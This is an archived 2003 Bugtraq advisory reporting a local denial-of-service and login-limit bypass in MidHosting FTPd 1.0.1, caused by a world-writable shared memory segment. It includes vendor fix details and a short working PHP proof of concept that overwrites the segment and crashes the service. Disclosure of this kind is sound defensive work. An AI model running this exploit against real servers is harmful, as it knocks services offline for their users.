[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20030618081835.GA19719@c9x.org>
Date: Wed, 18 Jun 2003 10:18:13 +0200
From: Frank Denis <j@...networks.com>
To: bugtraq@...urityfocus.com
Subject: MHFTPD vulnerability
Product : MidHosting FTPd
Date : 06/18/2003
Author : Frank Denis <j@...networks.com>
------------------------[ Product description ]------------------------
MidHosting FTPd is an FTP server designed for hosting servers, based upon
virtual ftpd with support for chroot, virtual users and other standard FTP
features.
Home page : http://freeware.tversu.ru/mhftpd/
------------------------[ Vulnerability ]------------------------
mhftpd can keep track of logged users in order to disable multiple
concurrent logins. The -m command-line switch enables this option.
Unfortunately, when this option is enabled, any user with shell access, CGI
access, PHP access, etc. can bypass this restriction or cause a permanent
denial of service.
------------------------[ Details ]------------------------
The list of currently logged users is kept in a public SysV shared memory
segment.
However this segment and the related locking semaphore are world readable
and world writable.
Non null-terminated user names will immediately cause a denial of service.
------------------------[ Exploit ]------------------------
Here's a trivial PHP script that triggers the flaw and makes the service
unavailable.
<?php
# mhftpd denial of service
define('SHMSIZE', 16384);
if (($shmid = shmop_open(ftok('/tmp', 'U'), 'w', 0777, SHMSIZE)) == -1) {
die();
}
shmop_write($shmid, str_repeat('A', SHMSIZE), 0);
?>
------------------------[ Affected versions ]------------------------
This issue has been verified on version 1.0.1 of MidHosting FTPd.
------------------------[ Vendor status and fixes ]------------------------
MidHosting FTPd author Ivan Stepnikov <iv@...rsu.ru> has been notified on
06/17/2003 and promptly fixed the permissions on the shared memory segment.
The fixed version is available for download from the main web site.
However it looks like the version number hasn't been bumped. In order to
check whether your software is vulnerable or not, please compute the MD5
digest of the tarball. The digest of the fixed one is
9b0bb31948ebbb11e9d2ef74276310df.
Powered by blists - more mailing lists